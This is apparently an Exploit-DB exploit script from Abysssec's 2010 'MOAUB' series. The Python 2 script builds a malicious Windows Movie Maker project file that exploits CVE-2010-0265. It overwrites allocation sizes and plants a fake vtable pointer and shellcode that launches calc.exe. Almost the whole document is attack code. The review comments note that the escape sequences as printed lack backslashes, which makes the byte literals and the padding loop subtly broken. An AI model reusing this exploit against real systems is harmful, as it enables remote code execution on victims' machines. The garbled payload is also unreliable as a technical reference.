
# Title : MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)
# Published : 2010-09-04
# Author : Abysssec


'''
 __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ <  Day 4 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

  http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/
  http://www.exploit-db.com/sploits/Movie-Maker-Remote-Code-Execution-Exploit.zip

  Title               : Movie Maker Remote Code Execution  (MS10-016)
  Version             : moviemk.exe 2.1 (XP SP3)
  Analysis            : http://www.abysssec.com
  Vendor              : http://www.microsoft.com
  Impact              : Critical
  Contact             : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             : @abysssec
  CVE                 : CVE-2010-0265

  
'''


# Exploit for CVE-2010-0265
# Tested on Windows XP SP3( Movie Maker 2.1 )
  


import sys

def main():
    """Build 'exploit.mswmm' by splicing fixed literals into a template 'src.mswmm'.

    The template is read from the working directory and cut into four slices at
    hard-coded offsets ([:9976], [9980:10104], [10108:16496], [17620:]).  The
    output is those slices written back in order with the literals below placed
    in the gaps.  Only IOError is handled: a message is printed and the process
    exits with status -1.  Python 2 code (print statements; str used as bytes).
    """
   
    try:
		# NOTE: opened 'rb+' (read/write) although the handle is only ever read.
		fdR = open('src.mswmm', 'rb+')
		strTotal = fdR.read()
		# Template slices; the byte ranges between them (9976..9980,
		# 10104..10108, 16496..17620) are dropped and replaced by the values
		# written further down.
		str1 = strTotal[:9976]
		str2 = strTotal[9980:10104]
		str3 = strTotal[10108:16496]
		str4 = strTotal[17620:]
		
		# NOTE(review): in this listing the escapes read 'x20x00...' with no
		# backslash, so these literals are multi-character ASCII text rather
		# than the 4-byte values the author's comments describe; the same holds
		# for the 'x90' padding and the shellcode string.  The printed bytes are
		# therefore not a reliable signature for the generated file.
		size_first_new = "x20x00x00x00"      # size of first new()
		size_second_new = "x11x11x00x00" 	# size of second new()
		
		p2p = "x71xb5x06x77"    #   vtable fake pointer from resource section COMRes -8 to jmp EBX 
		
		# shellcode calc.exe
		shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx00xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49x49x49x48x49x49x49x49x49x49x49x49x49x51x5ax6ax44x58x50x30x41x30x41x6bx41x41x54x42x32x41x42x32x42x41x30x42x41x58x41x50x38x41x42x75x4ax49x69x6cx4bx58x51x54x65x50x57x70x45x50x4ex6bx67x35x35x6cx4ex6bx73x4cx55x55x71x68x67x71x68x6fx6cx4bx52x6fx46x78x4ex6bx51x4fx71x30x74x41x7ax4bx30x49x6cx4bx54x74x6ex6bx76x61x4ax4ex35x61x4bx70x6ax39x4cx6cx4dx54x6bx70x30x74x54x47x6ax61x6ax6ax64x4dx63x31x79x52x4ax4bx69x64x67x4bx32x74x65x74x66x64x31x65x4ax45x6cx4bx71x4fx31x34x57x71x48x6bx52x46x6ex6bx64x4cx52x6bx4ex6bx31x4fx77x6cx54x41x68x6bx4cx4bx57x6cx6cx4bx57x71x4ax6bx4ex69x41x4cx65x74x67x74x4ax63x75x61x4fx30x51x74x6cx4bx61x50x50x30x4fx75x4fx30x32x58x64x4cx4cx4bx71x50x54x4cx4cx4bx70x70x57x6cx4ex4dx6ex6bx73x58x35x58x4ax4bx36x69x6cx4bx4dx50x4cx70x67x70x75x50x37x70x4cx4bx45x38x35x6cx41x4fx57x41x68x76x53x50x30x56x6ex69x6bx48x6fx73x6fx30x63x4bx62x70x30x68x58x70x6fx7ax57x74x51x4fx45x38x6fx68x59x6ex4fx7ax66x6ex62x77x69x6fx38x67x73x53x52x41x30x6cx71x73x64x6ex35x35x30x78x70x65x45x50x44'
		
					
		# Reject buffers longer than 1120 characters; otherwise pad up to 1120.
		# The second 'if' is always true here because the first branch returned.
		if len(shellcode) > 1120:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 1120:
			dif = 1120- len(shellcode)
			# As printed, 'x90' is three characters, so each pass appends three
			# while dif only drops by one.
			while dif > 0 :
				shellcode += 'x90'
				dif = dif - 1
				
		# The write order below *is* the output file layout; do not reorder.
		fdW= open('exploit.mswmm', 'wb+')
		fdW.write(str1)
		fdW.write(size_first_new)
		fdW.write(str2)
		fdW.write(size_second_new)
		fdW.write(str3)
		fdW.write(p2p)
		fdW.write('x90x90x90x90x90x90x90x90x90x90x90x90')     # padding		
		fdW.write(shellcode)
		fdW.write(str4)
		
		
		# NOTE(review): handles are only closed on the success path; an IOError
		# raised after fdR is opened leaves it open until interpreter exit.
		fdW.close()
		fdR.close()
		print '[-] Movie Maker file(.MSWMM) generated'
    except IOError:
        # Any failure opening, reading or writing either file ends here.
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == "__main__":
    # Script entry point: runs only when executed directly, not on import.
    main()